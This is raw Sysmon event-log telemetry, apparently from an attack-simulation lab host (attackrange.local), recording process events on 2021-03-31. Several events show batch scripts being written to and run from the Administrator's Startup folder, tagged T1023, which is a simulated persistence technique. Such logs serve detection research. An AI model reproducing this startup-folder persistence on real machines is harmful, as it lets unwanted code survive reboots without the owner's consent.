12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+4917|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.851{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT10232021-03-31 12:02:49.816{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd2021-03-31 12:02:49.816 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+484b|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.820{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 23542300x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.784{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-64E9-6064-C100-00000000AE01}20763448C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.726{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.720{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 